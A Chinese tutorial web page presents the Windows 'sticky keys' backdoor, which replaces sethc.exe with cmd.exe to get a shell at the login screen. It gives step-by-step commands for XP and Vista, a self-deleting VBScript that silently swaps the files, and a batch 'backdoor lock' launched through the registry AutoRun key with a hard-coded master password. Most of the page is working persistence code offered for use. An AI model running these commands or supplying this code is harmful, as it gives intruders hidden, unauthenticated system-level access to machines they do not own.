当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 变态入侵:有史以来最酷的Windows后门

安全基础
黑客攻击行为的特征分析及反攻击技术
Windows 2000中隐患重重的十大“服务”
网页脚本攻击防范全攻略
防患于未然 轻松做好Windows 2000安全策略
用注册表为操作系统砌九堵安全墙
完善网站程序 脚本攻击防范策略完全篇
两步修改XP远程管理默认端口可防止入侵
消除Windows XP自身的安全隐患
保护Windows不受恶意代码攻击
如何关闭和限制电脑不用的端口
修改Windows 2000远程终端默认端口
操作系统被入侵后的修复过程
利用微软基准安全分析器打造你安全的系统
数字签名技术简介
检测和删除系统中的木马
QQ密码破解程序
P2P中保障Windows网络安全
在代码中查找安全性缺陷的专家提示
QQ安全的三大纪律八项注意
如何保证文件夹的绝对安全

安全基础 中的 变态入侵:有史以来最酷的Windows后门


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-19   浏览: 133 ::
收藏到网摘: n/a

  后门原理:

  在Windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。

  XP:

  将安装源光盘弹出(或将硬盘上的安装目录改名)
  cd %widnir%\system32\dllcache
  ren sethc.exe *.ex~
  cd %widnir%\system32
  copy /y cmd.exe sethc.exe

  VISTA:

  takeown /f c:\windows\system32\sethc.exe
  cacls c:\windows\system32\sethc.exe /G administrator:F
  然后按XP方法替换文件

  在登录界面按5此SHIFT,出来cmd shell,然后……

  后门扩展:
  
  Dim obj, success 
  Set obj = CreateObject("WScript.Shell") 
  success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True) 
  success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True) 
  success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True) 
  success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True) 
  success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True) 
  success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) 

  第二句最有意思了.自动应答....以前就遇到过类似的问题

  再更新.加个自删除,简化代码... 

  On Error Resume Next 
  Dim obj, success 
  Set obj = CreateObject("WScript.Shell") 
  success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe&copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) 
  CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

  后门锁扩展:

 

  allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证

  用下面的后门锁的方法是 把代码保存为bdlock.bat

  然后修改注册表位置即可

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]
  "AutoRun"="bdlock.bat"

  @Echo Off
  title 后门登陆验证
  color a
  cls
  set temprandom=%RANDOM%
  echo 请输入验证码:%temprandom%
  set/p check=
  if "%check%"=="%temprandom%%temprandom%" goto passcheck
  if "%check%"=="%temprandom%" (
  rem 后门服务器验证
  rem 如果没有后门验证服务器请rem注释掉下一行代码
  if exist \192.168.8.8\backdoor$\pass goto passcheck
  )
  echo 验证失败
  pause
  exit
  :passcheck
  echo 验证成功
  If "%passcmdlock%"=="http://blog.csdn.net/freexploit/" Goto endx
  Set passcmdlock=http://blog.csdn.net/freexploit/
  :allyesno
  Set Errorlevel=>nul
  Echo 请输入验证密码?
  Set password=allyesno Is a pig>nul
  Set/p password=
  rem 万能密码
  if "%password%"=="allyesno is a sb" goto endx
  If %time:~1,1%==0 Set timechange=a
  If %time:~1,1%==1 Set timechange=b
  If %time:~1,1%==2 Set timechange=c
  If %time:~1,1%==3 Set timechange=d
  If %time:~1,1%==4 Set timechange=e
  If %time:~1,1%==5 Set timechange=f
  If %time:~1,1%==6 Set timechange=g
  If %time:~1,1%==7 Set timechange=h
  If %time:~1,1%==8 Set timechange=i
  If %time:~1,1%==9 Set timechange=j
  set/a sum=%time:~1,1%+%time:~1,1%
  Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul 
  If "%errorlevel%"=="0" cls&Echo 口令正确&Goto End
  Echo 请联系客服咨询正确密码!&Goto allyesno
  :End
  Set password=>nul
  Set Errorlevel=>nul
  Echo

  :endx